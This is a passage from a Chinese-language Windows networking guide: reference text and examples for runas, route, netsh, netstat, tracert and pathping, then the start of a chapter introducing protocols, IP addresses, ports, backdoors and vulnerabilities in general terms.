(*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。 可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用. runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。 如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。 有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。 如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。 范例 要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入: runas /user:localmachinename\administrator cmd 系统提示时,键入管理员密码。 要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入:runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc" 当提示时,键入帐户密码。 要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入: runas /user:user@domain.microsoft.com "notepad my_file.txt" 当提示时,键入帐户密码。 要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入: runas /netonly /user:domain\username "command" domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。 19.Route 在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。 语法 route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]] 参数 -f 清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。 -p 与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。 Command 指定要运行的命令。下表列出了有效的命令。命令 目的 add 添加路由 change 更改现存路由 delete 删除路由 print 打印路由 Destination 指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。 mask subnetmask 指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。 Gateway 指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。 metric Metric 为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。 if Interface 指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。 /? 在命令提示符显示帮助。 注释 路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。 如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。 如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如,10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。 使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。 只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示 IP 路由表的完整内容,请键入: route print 要显示 IP 路由表中以 10.开始的路由,请键入: route print 10.* 要添加默认网关地址为 192.168.12.1 的默认路由,请键入: route add 0.0.0.0 mask 0.0.0.0 192.168.12.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入: route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3 要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入: route delete 10.41.0.0 mask 255.255.0.0 要删除 IP 路由表中以 10.开始的所有路由,请键入: route delete 10.* 要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入: route change 10.41.0.0 mask 255.255.0.0 10.27.0.25 怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server 在命令行下更改ip地址 Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的): C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址) Windows 2000 IP Configuration Ethernet adapter 本地连接: Connection-specific DNS Suffix .: IP Address............: 10.1.1.94 (本地连接更改之前的ip) Subnet Mask ...........: 255.255.255.0 Default Gateway .........: 10.1.1.254 C:\>netsh (进入设置模式) netsh>interface interface>ip interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254 interface ip>exit 上文中的set命令具体解释如下: set address - 设置指定的接口的 IP 地址和默认网关。 set dns - 设置 DNS 服务器模式和地址。 set wins - 设置 WINS 服务器模式和地址。 网络常用命令: IPCONFIG C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功) Windows 2000 IP Configuration Ethernet adapter 本地连接: Connection-specific DNS Suffix . IP Address............: 10.1.1.111 Subnet Mask ...........: 255.255.255.0 Default Gateway .........: 10.1.1.254 命令一览 ..- 移到上一层上下文级。 ? - 显示命令列表。 aaaa - 更改到 `aaaa' 上下文。 abort - 丢弃在脱机模式下所做的更改。 add - 将一个配置项添加到项目列表中。 alias - 添加一个别名 bye - 退出程序。 commit - 提交在脱机模式中所做的更改。 delete - 在项目列表上删除一个配置项目。 dhcp - 更改到 `dhcp' 上下文。 dump - 显示一个配置脚本。 exec - 运行一个脚本文件。 exit - 退出程序。 help - 显示命令列表。 interface - 更改到 `interface' 上下文。 offline - 将当前模式设置成脱机。 online - 将当前模式设置成联机。 popd - 从堆栈上打开一个上下文。 pushd - 将当前上下文放推入堆栈。 quit - 退出程序。 ras - 更改到 `ras' 上下文。 routing - 更改到 `routing' 上下文。 set - 更新配置设置。 show - 显示信息 unalias - 删除一个别名。 wins - 更改到 `wins' 上下文。 快速切换IP地址有绝招 在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机 ,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换? 答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息: C:\Documents and Settings\Administrator>netsh netsh> netsh>int ip interface ip>dump # ---------------------------------- # 接口 IP 配置 # ---------------------------------- pushd interface ip # ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定) set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0 set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1 set dns name = ″本地连接″ source = static addr = 61.237.17.181 add dns name = ″本地连接″ addr = 211.97.168.129 add dns name = ″本地连接″ addr = 211.98.4.1 set wins name = ″本地连接″ source = static addr = none # ″本地连接 2″ 的接口 IP 配置 set address name = ″本地连接 2″ source = dhcp set dns name = ″本地连接 2″ source = dhcp set wins name = ″本地连接 2″ source = dhcp popd # 接口 IP 配置结束 快速切换IP地址有绝招 2 现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。 到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作: C:\Documents and Settings\Administrator>netsh netsh>int ip interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0 确认更改。 interface ip>exit 再用ipconfig命令核实一下: C:\Documents and Settings\Administrator>ipconfig Windows 2000 IP Configuration Ethernet adapter 本地连接 2 Media State ........... Cable Disconnected Ethernet adapter 本地连接 Connection-specific DNS Suffix . IP Address............ 192.168.0.7 Subnet Mask ........... 255.255.255.0 Default Gateway ......... 192.168.0.2 从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容:  int ip set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0 然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。 最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息: int ip set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0 set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1 同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换? 使用 netstat 显示连接统计 可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。 Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 -d 指定不将IP 地址解析到主机名称。 -h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。 -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。 -w timeout 等待 timeout 为每次回复所指定的毫秒数。 target_name 目标主机的名称或 IP 地址。 pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。 -n Hostnames 不将地址解析成主机名。 -h Maximum hops 搜索目标的最大跃点数。 -g Host-list 沿着路由列表释放源路由。 -p Period 在 ping 之间等待的毫秒数。 -q Num_queries 每个跃点的查询数。 -w Time-out 为每次回复所等待的毫秒数。 -T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。 -R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。-R 开关用于测试服务质量 (QoS) 连通性。 在命令提示符下交互使用 DHCP 命令 打开 命令提示符。 键入 netsh。 在 netsh>(Netshell) 命令提示行键入"dhcp"。 在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。 一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问" 一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。 route 的命令 routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。 routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。 routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。 routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。 routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。 routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。 routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。 routing ip add/delete/set/show scope 添加、删除或显示多播作用域。 routing ip set/show loglevel 配置或显示全局 IP 记录等级。 routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。 routing ip show protocol 显示所有正在运行的 IP 路由协议。 routing ip show mfe 显示多播转发项。 routing ip show mfestats 显示多播转发项统计。 routing ip show boundarystats 显示 IP 多播边界。 routing ip show r*estinations 显示路由表管理器路由表中的目标。 routing ip show rtmroutes 显示路由表管理器路由表中的路由。 routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。 routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。 routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。 routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。 routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。 routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。 routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。 routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。 routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。 routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。 routing ip igmp set/show global 配置或显示 IGMP 全局设置。 routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。 routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。 routing ip igmp show grouptable 显示 IGMP 主机组表。 routing ip igmp show ifstats 显示每个接口的 IGMP 统计。 routing ip igmp show iftable 显示每个接口的 IGMP 主机组。 routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。 routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。 routing ip ospf set/show global 配置或显示全局 OSPF 设置。 routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。 routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。 routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。 routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。 routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。 routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。 routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。 routing ip ospf show areastats 显示 OSPF 区域统计。 routing ip ospf show lsdb 显示 OSPF 链接状态数据库。 routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。 routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。 routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。 routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。 routing ip relay show ifbinding 显示接口的 IP 地址绑定。 routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。 routing ip relay show ifstats 显示每个接口的 DHCP 统计。 routing ip rip set/show global 配置 IP 的 RIP 全局设置。 routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。 routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。 routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。 routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。 routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。 routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。 routing ip rip show globalstats 显示全局 RIP 参数。 routing ip rip show ifbinding 显示接口的 IP 地址绑定。 routing ip rip show ifstats 显示每个接口的 RIP 统计。 IPX netsh 路由命令 routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。 routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。 routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。 routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。 routing ipx set global 配置全局 IPX 路由设置。 routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。 routing ipx rip set global 配置全局 IPX 的 RIP 设置。 routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。 routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。 routing ipx sap set global 配置全局 IPX 的 SAP 设置。 routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。 routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。 routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。 WINS NetSh 命令 list 列出所有可用的 WINS 命令。 dump 将 WINS 服务器配置转储到命令输出。 add name 在服务器上注册名称。详细信息,请输入 add name /? add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /? add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /? check database 检查数据库的一致性。详细信息,请输入 check database /? check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /? check version 检查版本号的一致性。详细信息,请输入 check version /? delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /? delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /? delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /? delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /? delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /? init backup 备份 WINS 数据库。详细信息,请输入 init backup /? init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /? init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /? init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /? init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /? init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /? init restore 从文件还原数据库。详细信息,请输入 init restore /? init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /? init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /? reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /? set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /? set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /? set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /? set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /? set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /? set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /? set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /? set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /? set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /? set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /? set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /? set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /? set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /? show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /? show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /? show info 显示配置信息。详细信息,请输入 show info /? show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /? show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /? show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /? show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /? show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /? show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /? show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /? show server 显示当前选定的服务器。详细信息,请输入 show server /? show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /? show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /? show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /? Interface 命令 interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。 interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名 第8章 一、协议: 网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。 这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。 每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。 对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。 二、服务器与客户端: 最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。 从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。 三、系统与系统环境: 电脑要运作必须安装操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。 不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。 四、IP地址和端口: 我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。 接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。 网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。 每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。 五、漏洞: 漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等…… 总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。 六、加密与解密: 